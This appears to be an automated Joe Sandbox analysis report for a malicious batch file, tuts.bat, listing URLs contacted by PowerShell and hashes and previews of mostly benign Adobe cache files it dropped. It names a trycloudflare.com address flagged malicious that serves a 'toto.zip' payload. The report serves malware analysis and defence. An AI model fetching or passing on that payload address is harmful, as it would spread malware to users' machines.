    http://x1.i.lencr.org/0%URL Reputationsafe
    http://x1.i.lencr.org/0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    https://go.micro0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    https://oneget.orgX0%URL Reputationsafe
    https://aka.ms/pscore680%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    https://oneget.org0%URL Reputationsafe
    https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip__author__=EscaLag__github__=gi4%VirustotalBrowse
    http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    x1.i.lencr.org
    unknown
    unknownfalseunknown
    terrorists-cultures-wallpaper-tabs.trycloudflare.com
    unknown
    unknowntrueunknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip__author__=EscaLag__github__=gipowershell.exe, 0000000F.00000002.1888393855.000002101C040000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1932073106.00000210360C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1897081412.000002101C2B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1896909361.000002101C2A3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1897081412.000002101C2B6000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.1898071686.000002101F7E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1929262107.000002102DF70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1929262107.000002102E0A6000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000F.00000002.1898071686.000002101F50A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.13.drfalse
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.1898071686.000002101F75E000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://crl.mrpowershell.exe, 0000000F.00000002.1933167475.00000210361F0000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.1898071686.000002101F75E000.00000004.00000800.00020000.00000000.sdmpfalse
        unknown
        https://go.micropowershell.exe, 0000000F.00000002.1898071686.000002101F067000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://terrorists-cultures-wallpaper-tabs.trycloudflare.compowershell.exe, 0000000F.00000002.1898071686.000002101F252000.00000004.00000800.00020000.00000000.sdmptrue
          unknown
          https://contoso.com/powershell.exe, 0000000F.00000002.1929262107.000002102E0A6000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.1898071686.000002101F7E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1929262107.000002102DF70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1929262107.000002102E0A6000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://contoso.com/Licensepowershell.exe, 0000000F.00000002.1929262107.000002102E0A6000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zip__author_powershell.exe, 0000000F.00000002.1933167475.0000021036240000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://contoso.com/Iconpowershell.exe, 0000000F.00000002.1929262107.000002102E0A6000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://oneget.orgXpowershell.exe, 0000000F.00000002.1898071686.000002101F50A000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/onpowershell.exe, 0000000F.00000002.1932073106.00000210360C2000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zipTpowershell.exe, 0000000F.00000002.1888393855.000002101C049000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://terrorists-cultures-wallpaper-tabs.trycloudflare.com/toto.zippowershell.exe, 0000000F.00000002.1898071686.000002101DEF1000.00000004.00000800.00020000.00000000.sdmptrue
                  unknown
                  https://aka.ms/pscore68powershell.exe, 0000000F.00000002.1898071686.000002101DEF1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.1898071686.000002101DEF1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.1898071686.000002101F75E000.00000004.00000800.00020000.00000000.sdmpfalse
                    unknown
                    https://oneget.orgpowershell.exe, 0000000F.00000002.1898071686.000002101F50A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    No contacted IP infos
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1546598
                    Start date and time:2024-11-01 08:22:07 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 44s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:23
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:tuts.bat
                    Detection:MAL
                    Classification:mal64.evad.winBAT@40/56@2/0
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 2
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .bat
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 2.19.126.143, 2.19.126.149, 184.28.88.176, 172.64.41.3, 162.159.61.3, 2.23.197.184, 52.202.204.11, 54.227.187.23, 52.5.13.197, 23.22.254.206, 184.28.90.27, 93.184.221.240, 23.32.184.135
                    • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, wu.azureedge.net, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                    • Execution Graph export aborted for target powershell.exe, PID 6592 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    TimeTypeDescription
                    03:23:18API Interceptor9x Sleep call for process: powershell.exe modified
                    03:23:21API Interceptor2x Sleep call for process: AcroCEF.exe modified
                    No context
                    No context
                    No context
                    No context
                    No context
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):292
                    Entropy (8bit):5.224630080592864
                    Encrypted:false
                    SSDEEP:6:H+LAzWS0yN+q2Pwkn2nKuAl9OmbnIFUt8Y+LAzWQUbZmw+Y+LAzWQUrVkwOwkn2C:r50TvYfHAahFUt82PUb/+2PUx5JfHAae
                    MD5:06EBA1AA9CBA71708DA6B33A186CA199
                    SHA1:3368B91FA61775C35E9287187D8E505889CAF120
                    SHA-256:1AB0AD310799D73D86507EE543929B24D19E3985C513DA91B849F810086E63EA
                    SHA-512:263F266CE2DA8B73E884DC81BE9D60C40A9771B1B7505C309B5F8B9F99D1A565D915B29A274A72D3F13157C87DC084ABA54D987D12A1FC05A5A5F01BC5387CEE
                    Malicious:false
                    Preview:2024/11/01-03:23:13.379 1958 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/01-03:23:13.387 1958 Recovering log #3.2024/11/01-03:23:13.387 1958 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):292
                    Entropy (8bit):5.224630080592864
                    Encrypted:false
                    SSDEEP:6:H+LAzWS0yN+q2Pwkn2nKuAl9OmbnIFUt8Y+LAzWQUbZmw+Y+LAzWQUrVkwOwkn2C:r50TvYfHAahFUt82PUb/+2PUx5JfHAae
                    MD5:06EBA1AA9CBA71708DA6B33A186CA199
                    SHA1:3368B91FA61775C35E9287187D8E505889CAF120
                    SHA-256:1AB0AD310799D73D86507EE543929B24D19E3985C513DA91B849F810086E63EA
                    SHA-512:263F266CE2DA8B73E884DC81BE9D60C40A9771B1B7505C309B5F8B9F99D1A565D915B29A274A72D3F13157C87DC084ABA54D987D12A1FC05A5A5F01BC5387CEE
                    Malicious:false
                    Preview:2024/11/01-03:23:13.379 1958 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/01-03:23:13.387 1958 Recovering log #3.2024/11/01-03:23:13.387 1958 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):336
                    Entropy (8bit):5.142155243128665
                    Encrypted:false
                    SSDEEP:6:H+LAzWcBE9+q2Pwkn2nKuAl9Ombzo2jMGIFUt8Y+LAzWcWNJZmw+Y+LAzWcWN9Vs:rS9+vYfHAa8uFUt82EJ/+2E9V5JfHAaU
                    MD5:C1DAC00632B5F0E8F6BEF506C4CD868A
                    SHA1:2BDB1BF167892E0D9908B74611524A82ED7934C4
                    SHA-256:E32418B3469807D5C4DB3C72A16ABAA9D078D7D28EB14B220C862FA1677EBCF2
                    SHA-512:6E50C65A99B1D4D1A7541E17E80CE57B3B08109740A517F3249419F3A79EB127F34FADB7F043CDC148BF207787277FADEAFD5C64C55AD6F73589E0E7E1C69014
                    Malicious:false
                    Preview:2024/11/01-03:23:13.393 1b4c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/01-03:23:13.395 1b4c Recovering log #3.2024/11/01-03:23:13.395 1b4c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):336
                    Entropy (8bit):5.142155243128665
                    Encrypted:false
                    SSDEEP:6:H+LAzWcBE9+q2Pwkn2nKuAl9Ombzo2jMGIFUt8Y+LAzWcWNJZmw+Y+LAzWcWN9Vs:rS9+vYfHAa8uFUt82EJ/+2E9V5JfHAaU
                    MD5:C1DAC00632B5F0E8F6BEF506C4CD868A
                    SHA1:2BDB1BF167892E0D9908B74611524A82ED7934C4
                    SHA-256:E32418B3469807D5C4DB3C72A16ABAA9D078D7D28EB14B220C862FA1677EBCF2
                    SHA-512:6E50C65A99B1D4D1A7541E17E80CE57B3B08109740A517F3249419F3A79EB127F34FADB7F043CDC148BF207787277FADEAFD5C64C55AD6F73589E0E7E1C69014
                    Malicious:false
                    Preview:2024/11/01-03:23:13.393 1b4c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/01-03:23:13.395 1b4c Recovering log #3.2024/11/01-03:23:13.395 1b4c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):475
                    Entropy (8bit):4.967403857886107
                    Encrypted:false
                    SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                    MD5:B7761633048D74E3C02F61AD04E00147
                    SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                    SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                    SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                    Malicious:false
                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:JSON data
                    Category:modified
                    Size (bytes):475
                    Entropy (8bit):4.977115811679975
                    Encrypted:false
                    SSDEEP:12:YH/um3RA8sqLpEsBdOg2Hycaq3QYiubInP7E4TX:Y2sRdsydMHd3QYhbG7n7
                    MD5:D270FA70EDE718170DBC119E82E49E6C
                    SHA1:1F6FB88F8CE48E33183E9AF2A277270240D488B0
                    SHA-256:E1656209E1DCA3FCE2981E3253A8A6EFF50BBE5754F53663E168718098D4C03F
                    SHA-512:5461DCA9C8EF79EB10A0110D75133EB15458CC371D49304105225639A02F84491A06B0D911C37A4527B8F40F8F49CB9BA0D0CA142B4C7480F84962C5755EE966
                    Malicious:false
                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375005802369947","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":377548},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):475
                    Entropy (8bit):4.967403857886107
                    Encrypted:false
                    SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                    MD5:B7761633048D74E3C02F61AD04E00147
                    SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                    SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                    SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                    Malicious:false
                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):475
                    Entropy (8bit):4.967403857886107
                    Encrypted:false
                    SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                    MD5:B7761633048D74E3C02F61AD04E00147
                    SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                    SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                    SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                    Malicious:false
                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4320
                    Entropy (8bit):5.258003850563585
                    Encrypted:false
                    SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7JBD45:etJCV4FiN/jTN/2r8Mta02fEhgO73gog
                    MD5:C0393A2ED30611FA64F17E2A9B3252EC
                    SHA1:BA2DFB4B0404AF1009E44D6DDCE22F9D52872FB5
                    SHA-256:F0D7D9EE93DAF0CE7E460BCCC0D98027C77190BA84876DE964C5A698815C3CA1
                    SHA-512:1177BD1FF17AC676ED3A09842FF6FF315F1B2162D13A1496BA18139F873862D127BD640646E2407B2AFB9F4DEBEE35329318DC0A193D6502D7E983E33EB81B97
                    Malicious:false
                    Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):324
                    Entropy (8bit):5.192294173339859
                    Encrypted:false
                    SSDEEP:6:H+LAzScQFeRGN9+q2Pwkn2nKuAl9OmbzNMxIFUt8Y+LAzScJ3JZmw+Y+LAzScSFz:rsFeS9+vYfHAa8jFUt82N3J/+2K9V5JH
                    MD5:A6B72081E40A95B0A6CBF796F9FB7FD4
                    SHA1:3A80423673706A14A1DD42573261F101D039B853
                    SHA-256:45E1C7945174D71059C1784CB2112D355DEBF8F9B1BBBEF2D4521D2684CE56D3
                    SHA-512:E609CCF3D0EB9EA3400220515C18B36C893E49A98A6DEBF45BC77757219E3989143460D27F89AF19C9C80E7498C6189E32087FB6BF58DABD0B335B5578941D6D
                    Malicious:false
                    Preview:2024/11/01-03:23:13.795 1b4c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/01-03:23:13.796 1b4c Recovering log #3.2024/11/01-03:23:13.797 1b4c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):324
                    Entropy (8bit):5.192294173339859
                    Encrypted:false
                    SSDEEP:6:H+LAzScQFeRGN9+q2Pwkn2nKuAl9OmbzNMxIFUt8Y+LAzScJ3JZmw+Y+LAzScSFz:rsFeS9+vYfHAa8jFUt82N3J/+2K9V5JH
                    MD5:A6B72081E40A95B0A6CBF796F9FB7FD4
                    SHA1:3A80423673706A14A1DD42573261F101D039B853
                    SHA-256:45E1C7945174D71059C1784CB2112D355DEBF8F9B1BBBEF2D4521D2684CE56D3
                    SHA-512:E609CCF3D0EB9EA3400220515C18B36C893E49A98A6DEBF45BC77757219E3989143460D27F89AF19C9C80E7498C6189E32087FB6BF58DABD0B335B5578941D6D
                    Malicious:false
                    Preview:2024/11/01-03:23:13.795 1b4c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/01-03:23:13.796 1b4c Recovering log #3.2024/11/01-03:23:13.797 1b4c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                    Category:dropped
                    Size (bytes):86016
                    Entropy (8bit):4.444506188045515
                    Encrypted:false
                    SSDEEP:384:yezci5tTiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rgs3OazzU89UTTgUL
                    MD5:2DBAB059E96405A86C1D03DE9FCB674F
                    SHA1:0598C133CCC7A1A6955479FBD5DCD127341A630C
                    SHA-256:1D58E8C06C5A07A60B5FF3E4D17CDB0213EADBFDA3278469645C78070DC9F772
                    SHA-512:1D3EA68510D8D5AB0DA1168F92A51D1209E3C5F51757DFEE04092C22E14F3488B232E6C253A3112F1ED46790398D18F9F0258540D90A334AAB5BDAFD44E82FB6
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite Rollback Journal
                    Category:dropped
                    Size (bytes):8720
                    Entropy (8bit):3.7706384849247576
                    Encrypted:false
                    SSDEEP:48:7MDpA2ioyVSv5ioy2v7oWoy1Cwoy1HvCKOioy1noy1AYoy1Wioy11ioyeioyBoyE:7gpfuSRByMSX2ji4b9IVXEBodRBkd
                    MD5:2C319CAC77FCC5345B1CE5E003BF5A3C
                    SHA1:32C5D710DBBAA5394ED889C54A8D24DA128F7C4A
                    SHA-256:0F247FF9353E6F1D1D4102F6CE3AAFC7DA4FF74A74013A8514FABCE518E81557
                    SHA-512:9CC1FAE102F9EF89051585ED651C4B28C775B1208C04E556EDCB308955732EFCF7F18657D4E488A1B1A147B44DD329E62A45FE07A324B8A80483CE072D82231A
                    Malicious:false
                    Preview:.... .c.....~..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:Certificate, Version=3
                    Category:dropped
                    Size (bytes):1391
                    Entropy (8bit):7.705940075877404
                    Encrypted:false
                    SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                    MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                    SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                    SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                    SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                    Malicious:false
                    Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                    Category:dropped
                    Size (bytes):71954
                    Entropy (8bit):7.996617769952133
                    Encrypted:true
                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                    Malicious:false
                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):192
                    Entropy (8bit):2.7381013623686155
                    Encrypted:false
                    SSDEEP:3:kkFklsUp/XfllXlE/HT8knylXNNX8RolJuRdxLlGB9lQRYwpDdt:kK1Up/IT8u2dNMa8RdWBwRd
                    MD5:7102494B28C64B54B4E9B4872C5F8689
